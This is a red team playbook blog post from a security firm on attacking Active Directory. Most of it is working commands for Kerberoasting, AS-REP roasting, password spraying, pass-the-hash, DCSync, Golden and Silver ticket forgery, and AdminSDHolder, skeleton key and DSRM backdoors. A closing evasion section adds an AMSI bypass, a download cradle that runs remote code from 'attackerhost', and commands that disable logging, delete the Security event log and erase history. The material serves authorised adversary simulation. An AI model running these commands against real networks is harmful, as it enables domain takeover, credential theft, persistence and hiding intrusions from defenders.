Active Directory remains the backbone of enterprise identity management, and for red teamers, it is often the most rewarding attack surface in any engagement. Understanding how AD attacks chain together from initial access through domain dominance is what separates a thorough red team assessment from a basic pentest. This playbook walks through the core phases of an Active Directory attack engagement with real commands, tools, and tradecraft used in modern operations.
If your organization needs a structured adversary simulation against your Active Directory environment, the red team specialists at Redfox Cybersecurity can help you identify and remediate gaps before real attackers do.
Before you have credentials, passive and semi-passive enumeration is critical. Start by identifying the domain, domain controllers, and exposed services.
# Identify domain controllers via DNS
nslookup -type=SRV _ldap._tcp.dc._msdcs.target.local
# Enumerate SMB shares anonymously
crackmapexec smb 192.168.1.0/24 --shares -u '' -p ''
# Identify hosts running LDAP
nmap -p 389,636,3268,3269 --open 192.168.1.0/24
[cta]
Once you have even a low-privileged domain account, the enumeration surface expands dramatically.
# Enumerate all domain users
Get-ADUser -Filter * -Properties * | Select-Object SamAccountName, MemberOf, LastLogonDate
# Enumerate domain groups
Get-ADGroup -Filter * | Select-Object Name, GroupScope, GroupCategory
# Find accounts with SPNs set (Kerberoastable)
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | Select-Object SamAccountName, ServicePrincipalName
# Find accounts with AS-REP Roasting flag (no pre-auth required)
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth
[cta]
BloodHound remains the gold standard for AD graph-based enumeration. Use SharpHound to collect data:
# Run SharpHound collector
.\SharpHound.exe -c All --zipfilename bloodhound_output.zip
# Or via PowerShell module
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Temp\
[cta]
Import the resulting ZIP into BloodHound and query for shortest paths to Domain Admin. The Shortest Paths to Domain Admins query alone often reveals attack chains that would take days to find manually.
Accounts with Kerberos pre-authentication disabled allow an unauthenticated attacker to request an encrypted TGT and crack it offline.
# Using impacket
python3 GetNPUsers.py target.local/ -usersfile users.txt -no-pass -dc-ip 192.168.1.10 -outputfile asrep_hashes.txt
# Crack offline with hashcat
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt --force
[cta]
Any authenticated domain user can request service tickets for accounts with SPNs registered. These tickets are encrypted with the service account's NTLM hash and can be cracked offline.
# Using impacket
python3 GetUserSPNs.py target.local/lowpriv:Password1 -dc-ip 192.168.1.10 -outputfile kerb_hashes.txt
# Crack with hashcat
hashcat -m 13100 kerb_hashes.txt /usr/share/wordlists/rockyou.txt
[cta]
# PowerShell alternative using Rubeus
.\Rubeus.exe kerberoast /outfile:kerbhashes.txt /domain:target.local
[cta]
High-value Kerberoasting targets are service accounts with weak passwords running as domain admins or with privileged ACLs. Prioritize tickets with RC4_HMAC_MD5 encryption, which are faster to crack than AES tickets.
Avoid lockouts by spraying a single password across many accounts, respecting the domain lockout threshold.
# CrackMapExec spray against SMB
crackmapexec smb 192.168.1.10 -u users.txt -p 'Summer2024!' --continue-on-success
# Spray via LDAP
python3 kerbrute.py passwordspray -d target.local --dc 192.168.1.10 users.txt 'Summer2024!'
[cta]
Check the domain lockout policy before spraying:
Get-ADDefaultDomainPasswordPolicy | Select-Object LockoutThreshold, LockoutObservationWindow, LockoutDuration
[cta]
When you recover NTLM hashes from memory or SAM dumps, Pass-the-Hash allows lateral movement without knowing the plaintext password.
# Using impacket psexec
python3 psexec.py -hashes :aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c Administrator@192.168.1.20
# CrackMapExec PTH
crackmapexec smb 192.168.1.0/24 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c --local-auth
[cta]
Stolen or forged Kerberos tickets can be injected into the current session to impersonate users without their credentials.
# Export tickets with Mimikatz
sekurlsa::tickets /export
# Inject a ticket
kerberos::ptt ticket.kirbi
# Using Rubeus
.\Rubeus.exe ptt /ticket:base64encodedticket
[cta]
Convert an NTLM hash directly into a Kerberos TGT, which is useful in environments where NTLM is restricted.
# Mimikatz
sekurlsa::pth /user:Administrator /domain:target.local /ntlm:8846f7eaee8fb117ad06bdd830b7586c /run:cmd.exe
[cta]
For organizations looking to validate their defenses against these lateral movement techniques, Redfox Cybersecurity offers full red team engagements that simulate exactly these attack chains in your production environment.
Misconfigured Access Control Lists are one of the most common and overlooked privilege escalation vectors. BloodHound surfaces these visually, but here is how to exploit them manually.
GenericWrite on a User Account (Shadow Credentials / Targeted Kerberoasting):
# Add an SPN to a user you have GenericWrite on
Set-ADUser -Identity targetuser -ServicePrincipalNames @{Add='http/fakespn.target.local'}
# Now Kerberoast that user
.\Rubeus.exe kerberoast /user:targetuser /outfile:targeted.txt
[cta]
WriteDACL Abuse:
# Grant yourself DCSync rights using PowerView
Add-DomainObjectAcl -TargetIdentity "DC=target,DC=local" -PrincipalIdentity lowpriv -Rights DCSync -Verbose
[cta]
Unconstrained delegation allows a machine or service account to impersonate any user authenticating to it. If you compromise a host with unconstrained delegation, you can capture TGTs from visiting users including domain admins.
# Find hosts with unconstrained delegation
python3 findDelegation.py target.local/lowpriv:Password1 -dc-ip 192.168.1.10
# Force a DC to authenticate to your unconstrained delegation host using SpoolSample (PrinterBug)
python3 printerbug.py target.local/lowpriv:Password1@dc01.target.local attackerhost.target.local
[cta]
# Monitor and capture TGTs on the delegation host with Rubeus
.\Rubeus.exe monitor /interval:5 /nowrap
[cta]
Constrained Delegation with Protocol Transition (S4U2Self/S4U2Proxy):
# Request a ticket on behalf of Administrator using a compromised service account
python3 getST.py target.local/svcaccount:Password1 -spn cifs/targetserver.target.local -impersonate Administrator -dc-ip 192.168.1.10
export KRB5CCNAME=Administrator.ccache
python3 psexec.py -k -no-pass targetserver.target.local
[cta]
Once you have DCSync rights (replication privileges), you can pull NTLM hashes for every account in the domain, including krbtgt, without touching the Domain Controller disk.
# Using secretsdump
python3 secretsdump.py target.local/lowpriv:Password1@dc01.target.local -just-dc-ntlm
# Mimikatz DCSync
lsadump::dcsync /domain:target.local /all /csv
[cta]
With the krbtgt hash, you can forge a Ticket Granting Ticket (Golden Ticket) that grants persistent, stealthy access to any service in the domain, even after password resets of individual accounts.
# Mimikatz Golden Ticket
kerberos::golden /user:Administrator /domain:target.local /sid:S-1-5-21-XXXXXXXXX /krbtgt:KRBTGT_NTLM_HASH /ptt
# Using ticketer from impacket
python3 ticketer.py -nthash KRBTGT_NTLM_HASH -domain-sid S-1-5-21-XXXXXXXXX -domain target.local Administrator
export KRB5CCNAME=Administrator.ccache
[cta]
The krbtgt account must be reset twice (with time between resets) to invalidate existing Golden Tickets, making this one of the most persistent footholds a red teamer can demonstrate.
Silver Tickets are forged service tickets using a service account's hash rather than krbtgt. They are harder to detect since they never touch the Domain Controller.
# Forge a CIFS service ticket for lateral movement
kerberos::golden /user:Administrator /domain:target.local /sid:S-1-5-21-XXXXXXXXX /target:server01.target.local /service:cifs /rc4:SERVICE_ACCOUNT_NTLM_HASH /ptt
[cta]
AdminSDHolder is a special AD object that controls the ACLs of protected accounts. Backdooring it grants permanent access even if ACLs on individual accounts are cleaned up.
# Add your attacker account to AdminSDHolder's ACL using PowerView
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=target,DC=local' -PrincipalIdentity backdoor_user -Rights All -Verbose
[cta]
The SDProp process runs every 60 minutes and will propagate your backdoor ACL to all protected accounts automatically.
Injecting a Skeleton Key into the LSASS process of a Domain Controller adds a universal master password that works alongside existing credentials.
# Mimikatz Skeleton Key (requires DA privileges)
privilege::debug
misc::skeleton
# Default skeleton key password is "mimikatz"
[cta]
This technique is volatile and does not survive reboots, which makes it useful for demonstrating persistence risk without leaving permanent artifacts.
Every Domain Controller has a local DSRM administrator account. If this password is configured to be usable over the network, it becomes a durable backdoor.
# Dump DSRM hash
lsadump::lsa /patch
# Enable DSRM logon over network via registry
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
[cta]
Red team engagements that demonstrate DSRM abuse give defenders clear evidence of why DC hardening and DSRM password rotation must be part of their operational baseline. The team at Redfox Cybersecurity regularly demonstrates this attack class as part of comprehensive Active Directory assessments.
Modern EDR and SIEM platforms flag well-known tool names and behaviors. Red teamers must adapt their tradecraft to stay under the radar during longer engagements.
# Rename Rubeus to avoid name-based detections# Use AMSI bypass before loading PowerShell tooling
Copy-Item .\Rubeus.exe .\svchost_helper.exe
[Ref].Assembly.GetType(
'System.Management.Automation.AmsiUtils'
).GetField(
'amsiInitFailed',
'NonPublic,Static'
).SetValue($null, $true)
# Load tooling reflectively from memory rather than disk
IEX (New-Object Net.WebClient).DownloadString('http://attackerhost/PowerView.ps1')
[cta]
Security tools flag heavy LDAP enumeration. Spread queries over time and avoid pulling all attributes at once.
# Targeted, low-noise LDAP query instead of pulling all users at once
([adsisearcher]"(&(objectCategory=person)(objectClass=user)(adminCount=1))").FindAll()
[cta]
# Disable PowerShell script block logging temporarily (requires admin)
Set-ItemProperty HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging -Name EnableScriptBlockLogging -Value 0
# Clear specific event log entries
[System.Diagnostics.EventLog]::Delete("Security") # Noisy, use targeted removal instead
# Remove PowerShell history
Remove-Item (Get-PSReadlineOption).HistorySavePath
[cta]
Active Directory attacks follow a clear chain: enumerate the environment, harvest or crack credentials, move laterally to high-value hosts, escalate privileges through ACL abuse or delegation flaws, compromise the domain via DCSync or ticket forgery, and establish persistence using backdoors that survive remediation attempts.
Every technique covered in this playbook, from AS-REP Roasting and Kerberoasting through Golden Tickets and AdminSDHolder abuse, represents a real attack path that adversaries use against enterprise environments today. Red teamers who understand how these attacks chain together deliver far more actionable findings than those who treat each technique in isolation.
Defenders benefit most when red team reports include the exact commands used, the detection opportunities at each stage, and clear remediation guidance. If your organization wants to see how these attack chains play out in your specific Active Directory environment, the red team at Redfox Cybersecurity can run a full adversary simulation and deliver findings that your security team can actually act on.
Redfox Cyber Security Inc.
8 The Green, Ste. A, Dover,
Delaware 19901,
United States.
.avif)
